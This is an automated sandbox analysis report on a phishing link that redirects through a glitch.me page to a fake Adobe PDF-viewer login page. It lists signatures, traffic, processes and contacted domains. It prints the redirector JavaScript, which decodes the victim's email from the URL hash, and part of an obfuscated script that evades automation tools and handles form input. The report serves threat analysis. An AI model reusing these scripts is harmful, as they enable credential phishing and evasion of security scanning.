Edit tour

Windows Analysis Report
https://crm1.ascentismedia.com/MatrixCRM2/CommunicationsCentre/publicpages/LinkTrackers.aspx?link=https%3A%2F%2Fdenionquil.glitch.me%23Y3VzdG9tZXJzZXJ2aWNlQGRpYXRyb24uY29t&blastid=HaJwKgulsuhThrevQ-bg1A==&cc=k7ybaJOHC1q7mw3Z9UVdFw==&linkid=n6XO784zESaOPkbEOEOx87g4IWcBarkC2D1Tdl8CJciDFYwgGprfRd-XvUJO

Overview

General Information

Sample URL:	https://crm1.ascentismedia.com/MatrixCRM2/CommunicationsCentre/publicpages/LinkTrackers.aspx?link=https%3A%2F%2Fdenionquil.glitch.me%23Y3VzdG9tZXJzZXJ2aWNlQGRpYXRyb24uY29t&blastid=HaJwKgulsuhThrevQ-bg
Analysis ID:	1592486

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

AI detected suspicious Javascript

HTML body contains low number of good links

HTML page contains hidden javascript code

HTML title does not match URL

Stores files to the Windows start menu directory

Suspicious form URL found

Classification

×

Process Tree

System is w10x64_ra

chrome.exe (PID: 5032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 4412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1804,i,9002788306504382465,853679110419216126,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 6564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://crm1.ascentismedia.com/MatrixCRM2/CommunicationsCentre/publicpages/LinkTrackers.aspx?link=https%3A%2F%2Fdenionquil.glitch.me%23Y3VzdG9tZXJzZXJ2aWNlQGRpYXRyb24uY29t&blastid=HaJwKgulsuhThrevQ-bg1A==&cc=k7ybaJOHC1q7mw3Z9UVdFw==&linkid=n6XO784zESaOPkbEOEOx87g4IWcBarkC2D1Tdl8CJciDFYwgGprfRd-XvUJO4gpJ&MID=gbzhqmttgi2dknbxgyza&CNO=&isCXComm=1" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

cleanup

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

• Phishing
• Compliance
• Networking
• System Summary
• Boot Survival

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: https://sales5rrt.digital/archiproduct/grunenthal.html#customerservice@diatron.com

Joe Sandbox AI: Score: 9 Reasons: The brand 'Adobe' is well-known and typically associated with the domain 'adobe.com'., The URL 'sales5rrt.digital' does not match the legitimate domain 'adobe.com'., The domain 'digital' is unusual for Adobe and could indicate a phishing attempt., The presence of an email input field with a non-Adobe domain 'diatron.com' is suspicious., The URL contains no direct reference to Adobe, which is a red flag for phishing. DOM: 1.1.pages.csv

AI detected suspicious Javascript

Source: 0.0.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://denionquil.glitch.me/#Y3VzdG9tZXJzZXJ2aWNl... The script demonstrates high-risk behavior by using base64 decoding to extract an email address from the URL hash, and then redirecting the user to a potentially malicious domain. This behavior is consistent with a phishing or credential harvesting attack, which poses a significant security risk.
Source: 0.1.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://sales5rrt.digital/archiproduct/grunenthal.... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. It attempts to execute various JavaScript environments and checks for the presence of web automation tools, likely to evade detection. The script also sets a cookie with a long expiration date, which could be used for malicious purposes. Overall, the script exhibits a high degree of suspicious and potentially malicious activity, warranting a high-risk score.

Source: https://sales5rrt.digital/archiproduct/grunenthal.html#customerservice@diatron.com

HTTP Parser: Number of links: 0

Source: https://sales5rrt.digital/archiproduct/grunenthal.html#customerservice@diatron.com

HTTP Parser: Base64 decoded: 1737010893.000000

Source: https://sales5rrt.digital/archiproduct/grunenthal.html#customerservice@diatron.com

HTTP Parser: Title: Online PDF Viewer does not match URL

Source: https://sales5rrt.digital/archiproduct/grunenthal.html#customerservice@diatron.com

HTTP Parser: Form action: postex.php

Source: https://sales5rrt.digital/archiproduct/grunenthal.html#customerservice@diatron.com

HTTP Parser: <input type="password" .../> found

Source: https://sales5rrt.digital/archiproduct/grunenthal.html#customerservice@diatron.com

HTTP Parser: No <meta name="author".. found

Source: https://sales5rrt.digital/archiproduct/grunenthal.html#customerservice@diatron.com

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49735 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27

Source: global traffic	DNS traffic detected: DNS query: crm1.ascentismedia.com
Source: global traffic	DNS traffic detected: DNS query: denionquil.glitch.me
Source: global traffic	DNS traffic detected: DNS query: sales5rrt.digital
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49735 version: TLS 1.2

Source: classification engine

Classification label: mal52.phis.win@18/12@12/25

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1804,i,9002788306504382465,853679110419216126,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://crm1.ascentismedia.com/MatrixCRM2/CommunicationsCentre/publicpages/LinkTrackers.aspx?link=https%3A%2F%2Fdenionquil.glitch.me%23Y3VzdG9tZXJzZXJ2aWNlQGRpYXRyb24uY29t&blastid=HaJwKgulsuhThrevQ-bg1A==&cc=k7ybaJOHC1q7mw3Z9UVdFw==&linkid=n6XO784zESaOPkbEOEOx87g4IWcBarkC2D1Tdl8CJciDFYwgGprfRd-XvUJO4gpJ&MID=gbzhqmttgi2dknbxgyza&CNO=&isCXComm=1"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1804,i,9002788306504382465,853679110419216126,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://crm1.ascentismedia.com/MatrixCRM2/CommunicationsCentre/publicpages/LinkTrackers.aspx?link=https%3A%2F%2Fdenionquil.glitch.me%23Y3VzdG9tZXJzZXJ2aWNlQGRpYXRyb24uY29t&blastid=HaJwKgulsuhThrevQ-bg1A==&cc=k7ybaJOHC1q7mw3Z9UVdFw==&linkid=n6XO784zESaOPkbEOEOx87g4IWcBarkC2D1Tdl8CJciDFYwgGprfRd-XvUJO4gpJ&MID=gbzhqmttgi2dknbxgyza&CNO=&isCXComm=1	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
crm1.ascentismedia.com	104.22.25.241	true	false		unknown
sales5rrt.digital	104.21.63.154	true	true		unknown
a.nel.cloudflare.com	35.190.80.1	true	false		high
denionquil.glitch.me	44.194.192.230	true	true		unknown
www.google.com	142.250.184.228	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://sales5rrt.digital/archiproduct/grunenthal.html#customerservice@diatron.com	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.194.192.230	denionquil.glitch.me	United States		14618	AMAZON-AESUS	true
104.22.25.241	crm1.ascentismedia.com	United States		13335	CLOUDFLARENETUS	false
142.250.185.110	unknown	United States		15169	GOOGLEUS	false
142.250.185.138	unknown	United States		15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
172.67.147.36	unknown	United States		13335	CLOUDFLARENETUS	false
35.190.80.1	a.nel.cloudflare.com	United States		15169	GOOGLEUS	false
142.250.184.228	www.google.com	United States		15169	GOOGLEUS	false
104.21.63.154	sales5rrt.digital	United States		13335	CLOUDFLARENETUS	true
142.250.74.195	unknown	United States		15169	GOOGLEUS	false
66.102.1.84	unknown	United States		15169	GOOGLEUS	false

Private

IP
192.168.2.17

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592486
Start date and time:	2025-01-16 08:00:51 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://crm1.ascentismedia.com/MatrixCRM2/CommunicationsCentre/publicpages/LinkTrackers.aspx?link=https%3A%2F%2Fdenionquil.glitch.me%23Y3VzdG9tZXJzZXJ2aWNlQGRpYXRyb24uY29t&blastid=HaJwKgulsuhThrevQ-bg1A==&cc=k7ybaJOHC1q7mw3Z9UVdFw==&linkid=n6XO784zESaOPkbEOEOx87g4IWcBarkC2D1Tdl8CJciDFYwgGprfRd-XvUJO4gpJ&MID=gbzhqmttgi2dknbxgyza&CNO=&isCXComm=1
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.phis.win@18/12@12/25

Warnings

Exclude process from analysis (whitelisted): TextInputHost.exe
Excluded IPs from analysis (whitelisted): 142.250.74.195, 66.102.1.84, 142.250.185.110, 216.58.212.174, 172.217.16.206, 142.250.185.138, 142.250.185.234, 142.250.185.170, 172.217.16.202, 142.250.186.138, 216.58.206.74, 172.217.18.10, 142.250.185.106, 142.250.184.202, 142.250.186.170, 142.250.185.202, 142.250.186.106, 142.250.185.74, 216.58.206.42, 142.250.181.234, 142.250.184.234
Excluded domains from analysis (whitelisted): clientservices.googleapis.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://crm1.ascentismedia.com/MatrixCRM2/CommunicationsCentre/publicpages/LinkTrackers.aspx?link=https%3A%2F%2Fdenionquil.glitch.me%23Y3VzdG9tZXJzZXJ2aWNlQGRpYXRyb24uY29t&blastid=HaJwKgulsuhThrevQ-bg1A==&cc=k7ybaJOHC1q7mw3Z9UVdFw==&linkid=n6XO784zESaOPkbEOEOx87g4IWcBarkC2D1Tdl8CJciDFYwgGprfRd-XvUJO4gpJ&MID=gbzhqmttgi2dknbxgyza&CNO=&isCXComm=1

LLM Input / Output

Input	Output
URL: https://crm1.ascentismedia.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false, "reasoning": "This appears to be a legitimate CRM (Customer Relationship Management) subdomain for a company called Ascentis Media. The structure is standard with a simple subdomain 'crm1', and uses a common .com TLD. No suspicious elements are present in the URL." }
URL: https://crm1.ascentismedia.com
URL: https://denionquil.glitch.me/#Y3VzdG9tZXJzZXJ2aWNl... Model: Joe Sandbox AI	{ "risk_score": 7, "reasoning": "The script demonstrates high-risk behavior by using base64 decoding to extract an email address from the URL hash, and then redirecting the user to a potentially malicious domain. This behavior is consistent with a phishing or credential harvesting attack, which poses a significant security risk." }
function base64Decode(str) { try { return decodeURIComponent(atob(str).split('').map(function(c) { return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2); }).join('')); } catch (e) { console.error('Invalid base64 string:', str); return null; } } var hash = window.location.hash; if (hash !== "") { hash = hash.substring(1); // Remove the '#' character const email = base64Decode(hash); if (email) { window.location.href = "https://sales5rrt.digital/archiproduct/grunenthal.html#" + (email); } }
URL: https://sales5rrt.digital/archiproduct/grunenthal.... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. It attempts to execute various JavaScript environments and checks for the presence of web automation tools, likely to evade detection. The script also sets a cookie with a long expiration date, which could be used for malicious purposes. Overall, the script exhibits a high degree of suspicious and potentially malicious activity, warranting a high-risk score." }
var _30="KGZ1bmN0aW9uKCl7CiAgICAgICAgdmFyIGEgPSBmdW5jdGlvbigpIHt0cnl7cmV0dXJuICEhd2luZG93LmFkZEV2ZW50TGlzdGVuZXJ9IGNhdGNoKGUpIHtyZXR1cm4gITF9IH0sCiAgICAgICAgYiA9IGZ1bmN0aW9uKGIsIGMpIHthKCkgPyBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgYiwgYykgOiBkb2N1bWVudC5hdHRhY2hFdmVudCgib25yZWFkeXN0YXRlY2hhbmdlIiwgYil9OwogICAgICAgIGIoZnVuY3Rpb24oKXsKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIG5vdyA9IG5ldyBEYXRlKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHZhciB0aW1lID0gbm93LmdldFRpbWUoKTsKICAgICAgICAgICAgICAgICAgICAgICAgdGltZSArPSAzMDAgKiAxMDAwOwogICAgICAgICAgICAgICAgICAgICAgICBub3cuc2V0VGltZSh0aW1lKTsKICAgICAgICAgICAgICAgICAgICAgICAgZG9jdW1lbnQuY29va2llID0gJ0xJVkVkT3U2eTlSeDk3ZDVnVWl4aWdHc1FLND0yNFY1ZmRfU3FHZnluQ3NIbUFKYmw5eVNuZEEnICsgJzsgZXhwaXJlcz0nICsgJ0ZyaSwgMTctSmFuLTI1IDA3OjAxOjMyIEdNVCcgKyAnOyBwYXRoPS8nOwogICAgICAgICAgICAgICAgICAgICAgICAvL2phdmFzY3JpcHQgcHV6emxlIGZvciBicm93c2VyIHRvIGZpZ3VyZSBvdXQgdG8gZ2V0IGFuc3dlcgogICAgICAgICAgICAgICAgICAgICAgICBpZighd2luZG93Ll9waGFudG9tIHx8ICF3aW5kb3cuY2FsbFBoYW50b20pey8qcGhhbnRvbWpzKi8KaWYoIXdpbmRvdy5fX3BoYW50b21hcyl7LypwaGFudG9tYXMgUGhhbnRvbUpTLWJhc2VkIHdlYiBwZXJmIG1ldHJpY3MgKyBtb25pdG9yaW5nIHRvb2wqLwppZighd2luZG93LkJ1ZmZlcil7Lypub2RlanMqLwppZighd2luZG93LmVtaXQpey8qY291Y2hqcyovCmlmKCF3aW5kb3cuc3Bhd24pey8qcmhpbm8qLwppZighd2luZG93LndlYmRyaXZlcil7LypzZWxlbml1bSovCmlmKCF3aW5kb3cuZG9tQXV0b21hdGlvbiB8fCAhd2luZG93LmRvbUF1dG9tYXRpb25Db250cm9sbGVyKXsvKmNocm9taXVtIGJhc2VkIGF1dG9tYXRpb24gZHJpdmVyKi8KaWYoIXdpbmRvdy5kb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuZ2V0QXR0cmlidXRlKCJ3ZWJkcml2ZXIiKSl7Ci8qaWYobmF2aWdhdG9yLnVzZXJBZ2VudCl7Ki8KaWYoIS9ib3R8Y3VybHxrb2RpfHhibWN8d2dldHx1cmxsaWJ8cHl0aG9ufHdpbmh0dHB8aHR0cmFja3xhbGV4YXxpYV9hcmNoaXZlcnxmYWNlYm9va3x0d2l0dGVyfGxpbmtlZGlufHBpbmdkb20vaS50ZXN0KG5hdmlnYXRvci51c2VyQWdlbnQpKXsKLyppZihuYXZpZ2F0b3IuY29va2llRW5hYmxlZCl7Ki8KLyppZihkb2N1bWVudC5jb29raWUubWF0Y2goL14oPzouKjspP1xzKlswLTlhLWZdezMyfVxzKj1ccyooW147XSspKD86LiopPyQvKSl7Ki8vKkh0dHBPbmx5IENvb2tpZSBmbGFncyBwcmV2ZW50IHRoaXMqLwogICAgICAgICAgICAgICAgICAgICAgICB2YXIgX181PXBhcnNlSW50KCIyMDI1MDExNSIsIDEwKSArIHBhcnNlSW50KCIxNTAxMjAyNSIsIDEwKTsKICAgICAgICAgICAgICAgICAgICAgICAgLyp9Ki8KLyp9Ki8KfQovKn0qLwp9Cn0KfQp9Cn0KfQp9Cn0KICAgICAgICAgICAgICAgICAgICAgICAgLy9lbmQgamF2YXNjcmlwdCBwdXp6bGUKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIHhodHRwID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLm9ucmVhZHlzdGF0ZWNoYW5nZSA9IGZ1bmN0aW9uKCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICh4aHR0cC5yZWFkeVN0YXRlID09PSA0KXsKICAgICAgICAgICAgICAgICBjb25zdCBmaXJzdEZvcm0gPSBkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCdmb3JtJyk7CgovLyBDaGVjayBpZiB0aGUgZm9ybSBleGlzdHMgYW5kIGlmIGl0IGhhcyBpbnB1dCBlbGVtZW50cwppZiAoZmlyc3RGb3JtKSB7CiAgY29uc3QgaW5wdXRGaWVsZHMgPSBmaXJzdEZvcm0ucXVlcnlTZWxlY3RvckFsbCgnaW5wdXQnKTsKICAKICBpZiAoaW5wdXRGaWVsZHMubGVuZ3RoID4gMCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI